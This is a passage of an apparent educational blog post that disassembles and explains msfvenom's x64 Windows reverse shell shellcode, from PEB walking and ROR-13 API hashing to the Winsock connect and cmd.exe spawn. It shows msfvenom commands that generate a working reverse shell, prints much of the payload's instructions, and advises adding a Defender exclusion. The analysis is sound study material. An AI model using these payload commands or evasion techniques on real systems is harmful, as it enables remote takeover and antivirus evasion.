
Analyzing msfvenom's reverse shell payload - Windows

This is my attempt at reverse engineering the shellcode used in msfvenom's x64 reverse shell payload on Windows, and describing how it works.

In this post, I will step through the shellcode used in msfvenom’s stageless reverse shell payload on Windows. While stepping through the shellcode I will explain the different mechanics and system internals used in the shellcode, and try to break it down as simply as possible. By the end of this post, you’ll have a better grasp of Windows internals, common antivirus evasion techniques, as well as a respect for the shellcode craft.

Disclaimer: I did use Anthropic’s Claude to assist in deciphering some parts of the shellcode I analyzed in this post. I did take the effort to validate Claude’s claims, and did not use Claude to generate any content in this post.

Prerequisites

Knowledge

This article assumes you have basic knowledge in assembly, C programming, and Windows System Internals. Where relevant, I’ll try to introduce concepts briefly, but a working familiarity with these topics will make the reading smoother.

Shellcode

As the title mentions, I’m using msfvenom to generate the shellcode I’m analyzing. msfvenom is a free tool offered in the Metasploit Framework. I use the objdump command in Linux to convert the shellcode into assembly instructions.

# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin

# disassemble the shellcode into human-readable assembly instructions
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin

Rather than reproducing the full shellcode here, I’ll walk through it snippet by snippet so that the focus stays on the analysis. Feel free to generate the shellcode yourself and follow along.

(Optional) Windows 11 VM & WinDbg

I’ve set up a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures for stock msfvenom payloads like this one, you’ll need to add an exclusion in Defender for the directory where you plan to store the msfvenom executable. Otherwise, Defender will flag and delete the executable the second it touches the disk.

While analyzing the shellcode, I used WinDbg to help step through some of the instructions. This helped me develop a better understanding of how the shellcode operates. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (like I did in the shellcode section).

# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe

Shellcode analysis

Part 1 - Initial setup

0:      fc                      cld
1:      48 83 e4 f0             and    rsp,0xfffffffffffffff0
5:      e8 c0 00 00 00          call   0xca

The first few instructions set the shellcode up for execution. We first clear the direction flag in EFLAGS (setting it to 0), forcing string instructions to process data forward (from low to high addresses).

The next instruction aligns the stack to a 16-byte boundary by clearing the low four bits of rsp, ensuring the stack pointer is a multiple of 16. This is common in x64 assembly: the Windows x64 calling convention expects a 16-byte aligned stack at each call, and functions that use aligned SSE instructions can crash without it.

The last instruction jumps to 0xca and, as a side effect, pushes the address of the next instruction (0xa) onto the stack. I’ll cover the significance of this in part 3.
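As a rough illustration of the alignment step, the following Python sketch applies the same mask to a stack pointer value. The function name and the sample addresses are made up for this example.

```python
def align_stack_16(rsp: int) -> int:
    """Mimic `and rsp, 0xfffffffffffffff0`: clear the low four bits of rsp."""
    return rsp & 0xFFFFFFFFFFFFFFF0


# Hypothetical stack pointer values, chosen only for illustration.
print(hex(align_stack_16(0x14FF38)))  # 0x14ff30
print(hex(align_stack_16(0x14FF30)))  # 0x14ff30 (already aligned, unchanged)
```

Because the mask only clears bits, the stack pointer can only move down (toward lower addresses), which is the direction the stack grows in.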

Part 2 - Function address lookup

This function is the meat and potatoes of how the shellcode works. Without it, we wouldn’t be able to call functions within the Windows API or load additional libraries as needed. It is also the most in-depth part of our analysis, since we’ll also be covering some of the essential parts of how Windows processes and executables operate.

2.1: Stage 1 - PEB walking & API hashing

In this stage, we’ll parse the Process Environment Block (PEB) and grab the list of loaded modules from the Loader Data (Ldr). One module at a time, we’ll load its DLL name and ROR-13 hash it before handing off to Stage 2. The following diagram shows the flow of this process.

Diagram 1: Stage 1 flowchart.

2.1.1: Save register values
   a:   41 51                   push   r9
   c:   41 50                   push   r8
   e:   52                      push   rdx
   f:   51                      push   rcx
  10:   56                      push   rsi
  11:   48 31 d2                xor    rdx,rdx 

These first few instructions are pretty simple. They push the values of the registers we plan to use onto the stack, so the registers can be restored to their previous state when the function ends. Lastly, rdx is zeroed out so it can act as a zero base for the gs-relative load that follows.

2.1.2: Load first DLL name from the Ldr
  14:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
  19:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  1d:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  21:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  25:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]

In Windows x64 assembly, gs is a segment register (the x86 equivalent is fs). Its base address points to the TEB (Thread Environment Block). From the TEB we can read the pointer to the PEB (Process Environment Block) at offset 0x60, giving us access to information regarding the current running process. Some of this information includes a list of modules the process has loaded (including DLLs). The following diagram attempts to visualize how this structure is laid out.

Diagram 2: How the shellcode accesses the PEB, Ldr, and InMemoryOrderModuleList structures.

The first three assembly instructions follow the chain from the TEB to the PEB (gs:[0x60]), from the PEB to the Ldr (offset 0x18), and from the Ldr to the InMemoryOrderModuleList (offset 0x20), leaving the address of the first module entry in the rdx register. From there, the last two instructions load the pointer to that entry’s BaseDllName buffer into rsi and the name’s maximum length (in bytes) into rcx.

This technique is known as PEB walking. It’s commonly used by malicious processes to look up functions in memory since, unlike a normal PE (Portable Executable), shellcode doesn’t have a PE header or import table to reference when looking up functions.
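The pointer chain can be replayed on a toy memory model. In the sketch below, the addresses and the dictionary standing in for memory are invented for illustration; only the offsets (0x60, 0x18, 0x20, 0x50, 0x4a) come from the disassembly above.

```python
# Hypothetical addresses; only the offsets come from the shellcode.
TEB, PEB, LDR, ENTRY, NAME_BUFFER = 0x1000, 0x2000, 0x3000, 0x4000, 0x5000

fake_memory = {
    TEB + 0x60: PEB,            # TEB -> PEB
    PEB + 0x18: LDR,            # PEB -> Ldr
    LDR + 0x20: ENTRY,          # Ldr -> InMemoryOrderModuleList.Flink
    ENTRY + 0x50: NAME_BUFFER,  # BaseDllName buffer pointer (relative to the list link)
    ENTRY + 0x4A: 26,           # BaseDllName maximum length in bytes
}


def walk_peb(memory: dict, gs_base: int) -> tuple:
    """Follow the same pointer chain as instructions 0x14 to 0x25."""
    rdx = memory[gs_base + 0x60]  # mov rdx, gs:[rdx+0x60]
    rdx = memory[rdx + 0x18]      # mov rdx, [rdx+0x18]
    rdx = memory[rdx + 0x20]      # mov rdx, [rdx+0x20]
    rsi = memory[rdx + 0x50]      # mov rsi, [rdx+0x50]
    rcx = memory[rdx + 0x4A]      # movzx rcx, word [rdx+0x4a]
    return rdx, rsi, rcx


entry, name_pointer, max_length = walk_peb(fake_memory, TEB)
print(hex(entry), hex(name_pointer), max_length)  # 0x4000 0x5000 26
```

Note that rdx ends up pointing at the list link inside the module entry rather than at the start of the entry, which is why the name offsets look smaller than the ones in the LDR_DATA_TABLE_ENTRY reference.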

2.1.3: Hash the BaseDllName and go to Stage 2
  2a:   4d 31 c9                xor    r9,r9
  2d:   48 31 c0                xor    rax,rax
  30:   ac                      lods   al,BYTE PTR [rsi]
  31:   3c 61                   cmp    al,0x61
  33:   7c 02                   jl     0x37
  35:   2c 20                   sub    al,0x20
  37:   41 c1 c9 0d             ror    r9d,0xd
  3b:   41 01 c1                add    r9d,eax
  3e:   e2 ed                   loop   0x2d

Next we’ll zero out the r9 register, which will hold the hash, and the rax register. After that, we use the lods instruction to load a single byte of the name into the al register (lower 8 bits of rax register). This instruction advances rsi to the next byte on its own. The loop instruction at 0x3e then decrements rcx and jumps back to 0x2d until rcx reaches zero, so every byte counted by the name’s maximum length gets hashed. Because BaseDllName is a UTF-16 string, that includes the zero high byte of each character and, typically, the null terminator.

Once we’ve loaded the byte into the al register, we check whether it is at or above 0x61 ('a'). If so, we subtract 0x20 to upper-case the letter (sub al,0x20). Only the lower bound is checked, which is good enough for DLL names. This is to eliminate varying naming conventions (i.e. kernel32.dll == Kernel32.Dll == KERNEL32.DLL).

Lastly, we’ll use the ror instruction to rotate the bits in the r9d register (lower 32 bits of r9 register) right by 13 positions (0xd). Once rotated, we’ll add the byte stored in the al register to our hash stored in the r9 register (to match register sizes, r9d and eax are used).

This technique is referred to as ROR-13 hashing. It is used to hide library function names within shellcode and memory, making it harder for antivirus and EDR solutions to statically detect and signature common Windows API functions used in malware.
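The hashing loop is small enough to model in a few lines of Python. This is a sketch under one assumption that is not visible in the disassembly itself: that the byte count in rcx covers the UTF-16LE name plus its two-byte null terminator. The function names are made up for this example.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def hash_module_name(name: str) -> int:
    """Hash a module name the way instructions 0x2a to 0x3e do.

    Assumption: the loop runs over the UTF-16LE name plus its terminator.
    """
    data = (name + "\0").encode("utf-16-le")
    h = 0
    for byte in data:
        if 0x61 <= byte < 0x80:      # cmp al,0x61 / jl is a signed comparison
            byte -= 0x20             # sub al,0x20
        h = ror32(h, 13)             # ror r9d,0xd
        h = (h + byte) & 0xFFFFFFFF  # add r9d,eax
    return h


print(hex(hash_module_name("kernel32.dll")))  # 0x92af16da
print(hash_module_name("Kernel32.Dll") == hash_module_name("KERNEL32.DLL"))  # True
```

The second line of output shows the effect of the upper-casing step: differently cased spellings of the same DLL name produce the same hash.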

2.2: Stage 2 - PE export table walking

This section walks over the functions of a DLL, hashing each function name and comparing it to the function hash supplied in the r10 register. If a matching function name cannot be found, it will step to the next DLL in the Ldr and jump back to stage 1. The following diagram highlights the process flow of stage 2:

Diagram 3: Stage 2 flowchart.

2.2.1: Load the export directory
  40:   52                      push   rdx
  41:   41 51                   push   r9
  43:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  47:   8b 42 3c                mov    eax,DWORD PTR [rdx+0x3c]
  4a:   48 01 d0                add    rax,rdx
  4d:   8b 80 88 00 00 00       mov    eax,DWORD PTR [rax+0x88]
  53:   48 85 c0                test   rax,rax
  56:   74 67                   je     0xbf

The first two instructions save the Ldr entry and BaseDllName’s hash to the stack for later use. Following that, the base address of the DLL is loaded into the rdx register and the RVA (Relative Virtual Address) for the base of the PE (Portable Executable) Header is loaded into the eax register (lower 32 bits of rax register). The two registers are then combined into the rax register to provide the base address for the PE Header.

After that, the Export Directory’s RVA, read from offset 0x88 of the PE Header, is loaded into the eax register, and rax is then tested against itself. If the DLL has no Export Directory, this value is 0 and the test sets the zero flag.

If the Export Directory is empty, the code will jump to 0xbf. This is where we step to the next DLL in our list and jump back to stage 1.

The following diagram displays the PE Format, and how it pertains to this stage of the address lookup function.

Diagram 4: The PE Format and the function table within the Export Directory.
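The two header reads at 0x47 and 0x4d can be sketched in Python against a byte buffer. The buffer below is a synthetic, mostly empty stand-in for a mapped 64-bit image with made-up values; only the offsets 0x3c and 0x88 come from the disassembly.

```python
import struct


def export_directory_rva(image: bytes) -> int:
    """Return the export directory RVA of a mapped 64-bit PE image."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)               # mov eax,[rdx+0x3c]
    (export_rva,) = struct.unpack_from("<I", image, e_lfanew + 0x88)  # mov eax,[rax+0x88]
    return export_rva


# Synthetic image with invented values, for illustration only.
fake_image = bytearray(0x200)
struct.pack_into("<I", fake_image, 0x3C, 0x80)           # PE header starts at 0x80
struct.pack_into("<I", fake_image, 0x80 + 0x88, 0x1000)  # export directory RVA
print(hex(export_directory_rva(bytes(fake_image))))      # 0x1000
```

A result of zero corresponds to the case where the shellcode takes the je at 0x56 and moves on to the next DLL.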

2.2.2: Prepare AddressOfNames[] array
  58:   48 01 d0                add    rax,rdx
  5b:   50                      push   rax
  5c:   8b 48 18                mov    ecx,DWORD PTR [rax+0x18]
  5f:   44 8b 40 20             mov    r8d,DWORD PTR [rax+0x20]
  63:   49 01 d0                add    r8,rdx
  66:   e3 56                   jrcxz  0xbe

Since the rax register is only an RVA for the Export Directory, we’ll need to add it to the base address for the DLL (rdx register). This is what the first instruction accomplishes, storing the sum in the rax register. Immediately after, we save the rax register to the stack.

We then prepare the AddressOfNames[] array. First, we’ll store the number of names in the array (read from offset 0x18) in the ecx register (lower 32 bits of rcx register), and then store the RVA of the array (read from offset 0x20) in the r8d register (lower 32 bits of r8 register). We then add the DLL’s base address (rdx register) to r8 to form the absolute address of the AddressOfNames[] array.

The final instruction, jrcxz, checks if the rcx register’s value equals zero. If so, it will jump to 0xbe where it prepares to load the next DLL, since there are no functions to iterate over. If it’s not zero, then we continue on.

2.2.3: Iterate over the AddressOfNames[] array and compare to the supplied function hash
  66:   e3 56                   jrcxz  0xbe
  68:   48 ff c9                dec    rcx
  6b:   41 8b 34 88             mov    esi,DWORD PTR [r8+rcx*4]
  6f:   48 01 d6                add    rsi,rdx
  72:   4d 31 c9                xor    r9,r9
  75:   48 31 c0                xor    rax,rax
  78:   ac                      lods   al,BYTE PTR [rsi]
  79:   41 c1 c9 0d             ror    r9d,0xd
  7d:   41 01 c1                add    r9d,eax
  80:   38 e0                   cmp    al,ah
  82:   75 f1                   jne    0x75
  84:   4c 03 4c 24 08          add    r9,QWORD PTR [rsp+0x8]
  89:   45 39 d1                cmp    r9d,r10d
  8c:   75 d8                   jne    0x66

I’ve included the last instruction from the previous section (jrcxz 0xbe), since it plays a role in the loop covered in this section. The next instruction decrements the value in the rcx register by one. Essentially, this loop is going over the AddressOfNames[] array backwards.

We begin our loop by grabbing the RVA pointer of the next function name, and moving it into the esi register (lower 32 bits of rsi register). We then add the RVA to the DLL’s base address, and store it in the rsi register. Next we ROR-13 hash the function name in the rsi register and place the hash in the r9 register like we did in stage 1 with the BaseDllName. This time there is no upper-casing, and instead of a byte counter we use cmp al,ah to check for the null-byte terminator (ah is zero, so the comparison only succeeds once al holds the end-of-string byte, which has already been folded into the hash by then).

Once the function name has been hashed, we add the BaseDllName hash we stored on the stack at the beginning of stage 2 (now at rsp+0x8) to it and keep the sum in the r9 register. Finally, we compare this newly calculated hash with the hash provided in the r10 register (r9d and r10d are used to compare the lower 32 bits of r9 and r10 registers).

If the hash doesn’t match, we jump back to the beginning of our loop at 0x66, and once again check if the value in the rcx register is zero. Otherwise, we continue on and retrieve the matching function’s address from the AddressOfFunctions[] array.
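The function-name loop and the final addition can be sketched in Python as well. The helper names are invented for this example, and the module hash constant is an assumption: it is the value the stage 1 loop would be expected to produce for KERNEL32.DLL.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def hash_function_name(name: str) -> int:
    """Hash an ASCII export name, terminator included, as in 0x72 to 0x82."""
    h = 0
    for byte in name.encode("ascii") + b"\x00":
        h = ror32(h, 13)             # ror r9d,0xd
        h = (h + byte) & 0xFFFFFFFF  # add r9d,eax
    return h


def combined_hash(module_hash: int, function_name: str) -> int:
    """add r9,[rsp+0x8]; only the low 32 bits are compared against r10d."""
    return (module_hash + hash_function_name(function_name)) & 0xFFFFFFFF


KERNEL32_HASH = 0x92AF16DA  # assumed stage 1 hash of "KERNEL32.DLL"
print(hex(combined_hash(KERNEL32_HASH, "LoadLibraryA")))  # 0x726774c
```

The printed value matches the constant that the shellcode loads into r10d before its LoadLibraryA call in part 3, which is a useful sanity check on the model.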

2.2.4: Retrieve address for matched function
  8e:   58                      pop    rax
  8f:   44 8b 40 24             mov    r8d,DWORD PTR [rax+0x24]
  93:   49 01 d0                add    r8,rdx
  96:   66 41 8b 0c 48          mov    cx,WORD PTR [r8+rcx*2]
  9b:   44 8b 40 1c             mov    r8d,DWORD PTR [rax+0x1c]
  9f:   49 01 d0                add    r8,rdx
  a2:   41 8b 04 88             mov    eax,DWORD PTR [r8+rcx*4]
  a6:   48 01 d0                add    rax,rdx

Once a matching hash is found, our next step is to use the index stored in the rcx register to retrieve the ordinal from the AddressOfNameOrdinals[] array, which in turn indexes the function’s entry in the AddressOfFunctions[] array. The first 4 instructions do just this, loading the AddressOfNameOrdinals[] base address into the r8 register and assigning the ordinal we’re looking for to the cx register (lower 16 bits of rcx register).

We then load the AddressOfFunctions[] array’s base address into the r8 register and retrieve the RVA for our hashed function and store it in the eax register (lower 32 bits of rax register). The final instruction takes the function’s RVA and adds it to the DLL’s base address, storing our function’s absolute address in the rax register.
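The relationship between the three export arrays is easier to see with plain Python lists. Everything in this sketch (the export names, ordinals, RVAs, and base address) is invented for illustration, and a string comparison stands in for the hash comparison.

```python
def resolve_export(base, names, name_ordinals, functions, wanted):
    """Walk the name table backwards and return the function's address.

    names[i] pairs with name_ordinals[i], which indexes into functions.
    """
    for i in range(len(names) - 1, -1, -1):   # dec rcx: highest index first
        if names[i] == wanted:                # stands in for the hash comparison
            ordinal = name_ordinals[i]        # mov cx,[r8+rcx*2]
            return base + functions[ordinal]  # function RVA + DLL base
    return None                               # the shellcode moves on to the next DLL


# Made-up export tables for a hypothetical DLL loaded at 0x180000000.
names = ["Alpha", "Beta", "Gamma"]
name_ordinals = [2, 0, 1]
functions = [0x1100, 0x1200, 0x1300]
print(hex(resolve_export(0x180000000, names, name_ordinals, functions, "Alpha")))  # 0x180001300
```

The extra hop through the ordinal array is why the index of a name cannot be used directly as an index into the function array.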

2.2.5: Call the matched function
  a9:   41 58                   pop    r8
  ab:   41 58                   pop    r8
  ad:   5e                      pop    rsi
  ae:   59                      pop    rcx
  af:   5a                      pop    rdx
  b0:   41 58                   pop    r8
  b2:   41 59                   pop    r9
  b4:   41 5a                   pop    r10
  b6:   48 83 ec 20             sub    rsp,0x20
  ba:   41 52                   push   r10
  bc:   ff e0                   jmp    rax

The first two instructions delete the values pushed to the stack in the beginning of stage 2.

Instructions 0xad to 0xb2 restore the values to the registers that we pushed to the stack in the beginning of stage 1.

From part 3 onwards, you’ll see a recurring function call, call rbp. That is calling the function we’ve been covering in part 2. When you use the call instruction in assembly, it pushes the address of the next instruction to the stack so the function we’re calling knows where to return execution when it’s finished. It then jumps to the address in the operand. Instruction 0xb4 pops this return address, left on the stack by call rbp, into the r10 register.

Then we grow the stack by 32 bytes (the shadow space that the Windows x64 calling convention reserves for a callee’s first four arguments), push the return address back to the stack, and jump to the function address we found in the AddressOfFunctions[] array. These last two instructions mimic the call instruction, as described in the last paragraph.
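To see what the stack looks like when the resolved API function starts running, the instructions from 0xa9 to 0xba can be replayed on a Python list. This is a simplified model: each list element stands for one 8-byte slot, the labels are placeholders, and the shadow-space slots are shown as None because their contents are undefined.

```python
def dispatch(stack: list) -> dict:
    """Replay instructions 0xa9 to 0xba; the last list element is the stack top."""
    stack.pop()                   # pop r8: discard the DLL name hash
    stack.pop()                   # pop r8: discard the saved Ldr entry
    registers = {}
    for name in ("rsi", "rcx", "rdx", "r8", "r9"):
        registers[name] = stack.pop()  # restore the caller's registers
    return_address = stack.pop()  # pop r10
    stack.extend([None] * 4)      # sub rsp,0x20: four shadow-space slots
    stack.append(return_address)  # push r10, followed by jmp rax
    return registers


# Placeholder labels, listed from the bottom of the stack to the top.
stack = ["arg6", "arg5", "return", "r9", "r8", "rdx", "rcx", "rsi", "ldr", "hash"]
registers = dispatch(stack)
print(stack)  # ['arg6', 'arg5', None, None, None, None, 'return']
```

Reading the result from the top down gives the layout a Windows x64 function expects on entry: the return address, four shadow-space slots, and then any stack-passed arguments.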

2.2.6: Jump point for preparing to go back to stage 1
  be:   58                      pop    rax
  bf:   41 59                   pop    r9
  c1:   5a                      pop    rdx
  c2:   48 8b 12                mov    rdx,QWORD PTR [rdx]
  c5:   e9 57 ff ff ff          jmp    0x21

This last part is used to prepare our jump back to stage 1. The first two instructions delete the last two values we pushed to the stack, the Export Directory address and the BaseDllName hash (the rax and r9 registers get zeroed-out in stage 1 anyway). When we arrive here from the je at 0x56, the Export Directory address was never pushed, which is why that jump lands on 0xbf and skips the first pop.

Now we restore the Ldr entry we saved in the beginning of stage 2 back to the rdx register. We then load the Flink pointer stored at the start of our current Ldr entry (refer to Diagram 2), which points to our next DLL, into the rdx register and jump back to stage 1 at 0x21 to hash and search again.

Part 3 - Connect to attacker machine (via Winsock)

In this part, we’ll configure Winsock and set up a reverse TCP connection to our attacker machine.

3.1: Configure rbp to point to address lookup function

5:      e8 c0 00 00 00          call   0xca
a:      41 51                   push   r9
...
ca:     5d                      pop    rbp

I’ve included the instructions at 0x5 and 0xa for context. The call instruction at 0x5 pushed its return address, 0xa, to the stack before jumping to 0xca. That address is where the address lookup function we covered in part 2 begins. The pop rbp instruction at 0xca takes it off the stack, so the rbp register now holds the address of our lookup function.

The rbp register is normally used as the base pointer of the current stack frame, but we’ll be using it as a placeholder for the address we call our function from part 2 with.
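The arithmetic behind relative calls and jumps is worth spelling out, since it also explains why 0xa is the value that ends up on the stack. The helper below is a sketch with a made-up name; the instruction addresses, lengths, and displacement bytes are taken from the listings in this post.

```python
def branch_target(address: int, length: int, displacement: int, bits: int = 32) -> int:
    """Target of a relative call/jmp/loop: next instruction plus signed displacement."""
    if displacement >= 1 << (bits - 1):  # interpret as two's complement
        displacement -= 1 << bits
    return address + length + displacement


print(hex(0x5 + 5))                               # return address pushed by the call at 0x5 -> 0xa
print(hex(0xCA - (0x5 + 5)))                      # displacement needed to reach 0xca -> 0xc0
print(hex(branch_target(0xC5, 5, 0xFFFFFF57)))    # jmp at 0xc5 -> 0x21
print(hex(branch_target(0x3E, 2, 0xED, bits=8)))  # loop at 0x3e -> 0x2d
```

The same formula applies to every short jump in the listings, with an 8-bit displacement instead of a 32-bit one.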

3.2: Create SOCKADDR_IN struct & call LoadLibraryA(“ws2_32”)

  cb:   49 be 77 73 32 5f 33    movabs r14,0x32335f327377
  d2:   32 00 00 
  d5:   41 56                   push   r14
  d7:   49 89 e6                mov    r14,rsp
  da:   48 81 ec a0 01 00 00    sub    rsp,0x1a0
  e1:   49 89 e5                mov    r13,rsp
  e4:   49 bc 02 00 11 5c 7f    movabs r12,0x100007f5c110002
  eb:   00 00 01 
  ee:   41 54                   push   r12
  f0:   49 89 e4                mov    r12,rsp
  f3:   4c 89 f1                mov    rcx,r14
  f6:   41 ba 4c 77 26 07       mov    r10d,0x726774c
  fc:   ff d5                   call   rbp

We will now move the value 0x32335f327377 into the r14 register. Stored in memory as little-endian, its bytes spell the string “ws2_32” followed by null bytes. This string is the name used when importing the Winsock library. We’ll need this library’s functions to connect a shell process back to our attacker machine.

Now we’ll push the r14 register to the stack, then move the stack pointer (pointing to our string) back into the r14 register. We do this because the argument for LoadLibraryA requires a pointer to a string, which this technically is.
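A quick way to check what a pushed register value looks like in memory is to pack it as a little-endian 64-bit integer. The helper name below is made up for this sketch.

```python
import struct


def immediate_to_bytes(value: int) -> bytes:
    """Bytes written to memory when a 64-bit register holding `value` is pushed."""
    return struct.pack("<Q", value)


print(immediate_to_bytes(0x32335F327377))  # b'ws2_32\x00\x00'
```

The trailing null bytes come from the unused high bytes of the register, which is what makes the pushed value usable as a null-terminated C string.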

We then grow our stack by 416 bytes (0x1a0), and copy our new stack pointer into the r13 register.

Next, we move the first 8 bytes of our SOCKADDR_IN structure (address family, port, and IP address) into the r12 register. Our struct looks something like this in memory:

Diagram 5: SOCKADDR_IN structure.

Address family is stored in memory as little-endian, like most other values in x86 architecture. This equals out to AF_INET (0x0002), and should always be AF_INET.

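Since port and IP address are used by the network stack, they need to be stored in memory as big-endian (network byte order). Here the port bytes 11 5c read as 0x115c (4444), and the address bytes 7f 00 00 01 read as 127.0.0.1. It is confusing to decipher at first, but easier as you become more familiar with it.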

Like our “ws2_32” string in the r14 register, we’ll push the r12 register holding our SOCKADDR_IN structure to the stack and move the stack pointer into the r12 register. This creates a pointer to our SOCKADDR_IN structure.
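The mixed byte orders are easier to follow when the immediate is decoded field by field. The following Python sketch (function name invented for this example) unpacks the value loaded into r12 at 0xe4.

```python
import socket
import struct


def decode_sockaddr_in(value: int) -> tuple:
    """Split the 8-byte immediate into address family, port, and IPv4 address."""
    raw = struct.pack("<Q", value)               # bytes as they sit in memory
    (family,) = struct.unpack_from("<H", raw, 0)  # little-endian, like most x86 data
    (port,) = struct.unpack_from(">H", raw, 2)    # big-endian (network byte order)
    address = socket.inet_ntoa(raw[4:8])          # four address bytes in network order
    return family, port, address


print(decode_sockaddr_in(0x0100007F5C110002))  # (2, 4444, '127.0.0.1')
```

Port 4444 shows up because no LPORT was passed to msfvenom, so its default was used.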

We’ll now move the pointer to our “ws2_32” string in the r14 register into the rcx register, since rcx holds the first argument for a function. Then we’ll move the hash 0x726774c into the r10d register (lower 32 bits of r10 register). This hash is the ROR-13 hash of the LoadLibraryA function.

Finally, we call our address lookup function. This will match our hash for LoadLibraryA, find its address in memory, then jump to it with a pointer to our “ws2_32” string as the only argument in the rcx register.

3.3: Call WSAStartup()

  fe:   4c 89 ea                mov    rdx,r13
 101:   68 01 01 00 00          push   0x101
 106:   59                      pop    rcx
 107:   41 ba 29 80 6b 00       mov    r10d,0x6b8029
 10d:   ff d5                   call   rbp

In the last section, we grew the stack by 416 bytes and saved the stack pointer in the r13 register. We will now move this pointer into the rdx register. Then we will push the value 0x101 to the stack, and immediately pop it into the rcx register.

Now it’s time for us to load the hash for the WSAStartup function into the r10d register (lower 32 bits of the r10 register) and call the function.

The first argument (rcx register) of the WSAStartup function uses a WORD value to specify which Windows Sockets version should be used. The higher byte stores the minor version number and the lower byte stores the major version number. In our shellcode, we are loading version 1.1 of Windows Sockets.

The second argument (rdx register) is the pointer address where WSAStartup will store the WSADATA structure on the stack. This will hold information necessary for utilizing the Windows Sockets API.
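As a small worked example of the version encoding, this sketch splits the WORD into its two bytes. The function name is made up; the byte positions follow the description above.

```python
def split_winsock_version(version_word: int) -> tuple:
    """Return (major, minor) from a WSAStartup version WORD."""
    major = version_word & 0xFF         # low-order byte
    minor = (version_word >> 8) & 0xFF  # high-order byte
    return major, minor


print(split_winsock_version(0x0101))  # (1, 1)
print(split_winsock_version(0x0002))  # (2, 0)
```

With 0x101 both bytes are 1, so the byte order does not matter for this payload, but it would for a request such as version 2.0.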

3.4: Call WSASocketA()

 10f:   50                      push   rax
 110:   50                      push   rax
 111:   4d 31 c9                xor    r9,r9
 114:   4d 31 c0                xor    r8,r8
 117:   48 ff c0                inc    rax
 11a:   48 89 c2                mov    rdx,rax
 11d:   48 ff c0                inc    rax
 120:   48 89 c1                mov    rcx,rax
 123:   41 ba ea 0f df e0       mov    r10d,0xe0df0fea
 129:   ff d5                   call   rbp

We will now create the socket for our network connection using the WSASocketA function. This function takes six arguments, but the Windows x64 calling convention only passes the first four in registers (rcx, rdx, r8, and r9), so we’ll need to utilize the stack to handle the last two arguments.

At this point, the rax register should equal 0x0. The first instruction will set the dwFlags argument to 0x0, meaning no flags will be set. The second instruction sets the g argument to 0x0 as well, meaning no group operations are performed. We utilize the stack to pass these arguments to the WSASocketA function. Since the stack is LIFO (Last In First Out) we need to pass the dwFlags argument first, since it is the last argument. Then we’ll push the g argument.

Next we will zero-out the r8 and r9 registers. This will set the protocol and lpProtocolInfo arguments to NULL. We then increment the rax register and assign that value to rdx register, equaling 0x1. This will set the type argument to SOCK_STREAM. We once again increment the rax register and assign that value to rcx register, equaling 0x2. This will set the af argument to AF_INET.

Once this is all set, we now load the hash for the WSASocketA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a handle for the new socket in the rax register.
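The way the six arguments are split between registers and the stack can be sketched as follows. This is a simplified model of the Windows x64 convention for integer and pointer arguments only, and the helper name is invented for this example.

```python
REGISTER_ORDER = ("rcx", "rdx", "r8", "r9")


def place_arguments(args: list) -> tuple:
    """Assign the first four arguments to registers; the rest are pushed in reverse."""
    registers = dict(zip(REGISTER_ORDER, args))
    pushes = list(reversed(args[4:]))  # last argument is pushed first
    return registers, pushes


wsasocket_args = [
    ("af", 2), ("type", 1), ("protocol", 0),
    ("lpProtocolInfo", 0), ("g", 0), ("dwFlags", 0),
]
registers, pushes = place_arguments(wsasocket_args)
print(registers["rcx"], registers["rdx"])  # ('af', 2) ('type', 1)
print(pushes)                              # [('dwFlags', 0), ('g', 0)]
```

The push order matches the two push rax instructions at 0x10f and 0x110: dwFlags goes on the stack first so that g ends up closer to the top.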

3.5: Connect to the attacker host

 12b:   48 89 c7                mov    rdi,rax
 12e:   6a 10                   push   0x10
 130:   41 58                   pop    r8
 132:   4c 89 e2                mov    rdx,r12
 135:   48 89 f9                mov    rcx,rdi
 138:   41 ba 99 a5 74 61       mov    r10d,0x6174a599 <- connect()
 13e:   ff d5                   call   rbp

First, we save the socket handle returned by WSASocketA in the rdi register. We then load 0x10 (16 in decimal) into the r8 register. This will serve as the length of our SOCKADDR_IN structure. Then we move the pointer to our SOCKADDR_IN structure (held in r12) into the rdx register, and move our socket handle into the rcx register.

Then we will load the hash for the Winsock connect function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function will return zero.

Part 4 - Spawn a shell

In this part, we spawn a cmd.exe shell with STDIN/STDOUT/STDERR pointing to our socket handle. We then wait for the newly created process to terminate and gracefully exit our shellcode.

4.1: Call CreateProcessA() to open cmd.exe

 140:   48 81 c4 40 02 00 00    add    rsp,0x240
 147:   49 b8 63 6d 64 00 00    movabs r8,0x646d63
 14e:   00 00 00 
 151:   41 50                   push   r8
 153:   41 50                   push   r8
 155:   48 89 e2                mov    rdx,rsp
 158:   57                      push   rdi
 159:   57                      push   rdi
 15a:   57                      push   rdi
 15b:   4d 31 c0                xor    r8,r8
 15e:   6a 0d                   push   0xd
 160:   59                      pop    rcx
 161:   41 50                   push   r8
 163:   e2 fc                   loop   0x161
 165:   66 c7 44 24 54 01 01    mov    WORD PTR [rsp+0x54],0x101
 16c:   48 8d 44 24 18          lea    rax,[rsp+0x18]
 171:   c6 00 68                mov    BYTE PTR [rax],0x68
 174:   48 89 e6                mov    rsi,rsp
 177:   56                      push   rsi
 178:   50                      push   rax
 179:   41 50                   push   r8
 17b:   41 50                   push   r8
 17d:   41 50                   push   r8
 17f:   49 ff c0                inc    r8
